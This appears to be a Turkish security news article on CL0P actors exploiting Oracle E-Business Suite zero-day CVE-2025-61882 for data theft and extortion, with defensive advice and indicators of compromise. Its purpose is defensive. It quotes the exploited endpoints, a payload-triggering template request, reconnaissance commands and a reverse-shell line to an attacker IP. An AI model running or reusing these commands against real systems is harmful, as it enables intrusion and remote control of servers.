Oracle E-Business Suite’i kullanan kuruluşlar, CL0P şantaj aktörlerinin aktif, yaygın suistimalini azaltmak ve veritabanlarındaki kötü amaçlı şablonları avlamak için 4 Ekim acil durum yamalarını derhal uygulamalıdır.
29 Eylül 2025’ten itibaren, Google Tehdit İstihbaratı Grubu (GTIG) ve Mandiant, Oracle E-Business Suite (EBS) ortamlarından hassas verilerin çalındığı iddiasıyla düzinelerce kuruluştaki yöneticileri hedef alan büyük bir e-posta kampanyası tespit etti.
Yüzlerce ele geçirilmiş üçüncü taraf hesaptan gönderilen şantaj mesajları, Ağustos ortasına kadar uzanan meşru dosya listelerini içeriyordu. Henüz CL0P DLS’de herhangi bir mağdur görünmese de geçmiş kampanyalar, verilerin ilk erişimden birkaç hafta sonra yayınlanabileceğini öne sürüyor.
2 Ekim’de Oracle, istismar edilen güvenlik açıklarının Temmuz Kritik Yama Güncellemesinde yamalandığını bildirdi ve müşterilerini derhal en son CPU’yu uygulamaları konusunda uyardı.
İki gün sonra Oracle, özellikle CVE-2025-61882’ye yönelik acil durum düzeltmeleri yayınladı ve tüm yamalarda güncel kalma ihtiyacını yineledi.
Çok Aşamalı Java İmplant Çerçevesi
GTIG’nin analizi, kampanyayı aylarca süren izinsiz giriş faaliyetlerinden yararlanan bir CL0P aktörüne bağlıyor. İlk yararlanma 10 Temmuz gibi erken bir tarihte başlamış olabilir, ancak 9 Ağustos itibarıyla sıfır gün güvenlik açığı (CVE-2025-61882) UiServlet ve SyncServlet bileşenlerine karşı aktif olarak kullanılıyordu.
Çok aşamalı Java implant çerçevesi, uzaktan kod yürütmeyi gerçekleştirmek için Sunucu Tarafı İstek Sahteciliği, CRLF enjeksiyonu, kimlik doğrulama atlama ve XSL şablon enjeksiyonunu birleştirir.
Ağustos ayında saldırganlar SyncServlet’i şu yollarla istismar etti:
textPOST /OA_HTML/SyncServlet
Daha sonra, XDO_TEMPLATES_B tablosuna kötü amaçlı XSL verileri yüklemek için XDO Şablon Yöneticisini kötüye kullandılar. Aşağıdaki gibi bir şablon önizleme isteği:
text/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG
&TemplateCode=TMP|DEF<16_RANDOM_HEX>&TemplateType=XSL-TEXT
yükün yürütülmesini tetikler. XSL verisi bir Base64 Java implantının kodunu çözer, bir ScriptEngine örneğini oluşturur ve saldırgan tarafından kontrol edilen kodu değerlendirir.
“applmgr” hesabı altında yürütülen komutlara örnek olarak sistem keşfi (cat /etc/fstab, df -h, ip addr) ve ters kabuk bağlantıları:
textbash -i >& /dev/tcp/200.107.207.26/53 0>&1
İki farklı Java zinciri (GOLDVEIN.JAVA indiricisi ve SAGEWAVE ile sonuçlanan iç içe geçmiş SAGE* yansıtıcı yükleyici dizisi), ikinci aşama yük alımını ve kalıcı filtre kurulumunu mümkün kılar.
TEMPLATE_CODE’un “TMP” veya “DEF” ile başladığı girişleri inceleyin. C2 iletişimlerini engellemek için EBS sunucularından giden İnternet erişimini kısıtlayın.
Uygulanabilir Rehberlik
Kritik ilk adım anında yama uygulamaktır: CVE-2025-61882 için Oracle 4 Ekim acil durum yamalarını gecikmeden uygulayın. Yama dağıtımını takiben savunmacılar kötü amaçlı şablonları avlamalıdır:
TEMPLATE_CODE’un “TMP” veya “DEF” ile başladığı girişleri inceleyin. C2 iletişimlerini engellemek için EBS sunucularından giden İnternet erişimini kısıtlayın.
Bu kampanya, sıfır gün sömürüsünü gecikmeli gaspla birleştirmenin stratejik avantajının altını çiziyor. CL0P’ye bağlı aktörler, halka açık kurumsal uygulamaları hedef alarak, erken tespitten kaçarken aynı zamanda geniş ölçekte verileri hızlı bir şekilde sızdırabilir.
Anormal istekler için ağ günlüklerini izleyin /OA_HTML/configurator/UiServlet ve TemplatePreviewPG uç noktası. Diskte görünmeyen bellek içi implantları tespit etmek için Java süreçlerinde bellek adli bilişiminden yararlanın.
2020-2025’e kadar sıfır günlerden yararlanma geçmişleri göz önüne alındığında, kuruluşların ana hedefler olarak kaldıklarını ve sıkı yama ve izleme rejimlerini sürdürdüklerini varsaymaları gerekir.
Uzlaşma Göstergeleri
| Tip | Gösterge | Tanım |
|---|---|---|
| Ağ | 200.107.207.26 | UiServlet ve SyncServlet bileşenlerini hedef alan yararlanma girişimlerinde gözlemlenen IP adresi. |
| Ağ | 161.97.99.49 | UiServlet bileşenini hedef alan yararlanma girişimlerinde gözlemlenen IP adresi. |
| Ağ | 162.55.17.215:443 | GOLDVEIN.JAVA C2 |
| Ağ | 104.194.11.200:443 | GOLDVEIN.JAVA C2 |
| Ağ | /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG… | Kötü amaçlı XSL yükünü tetikleme girişiminin göstergesi. TemplateCode’un TMP veya DEF ile başladığı istekleri arayın. |
| Ağ | /OA_HTML/yapılandırıcı/UiServlet | Temmuz 2025’teki kullanım etkinliğinde hedeflenen uç nokta. |
| Ağ | /OA_HTML/SyncServlet | Ağustos 2025’teki kullanım etkinliğinde hedeflenen uç nokta. |
| Ağ | /help/state/content/destination./navId.1/navvSetId.iHelp/ | SAGEWAVE tarafından filtrelenen HTTP yolu alt dizesi |
Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.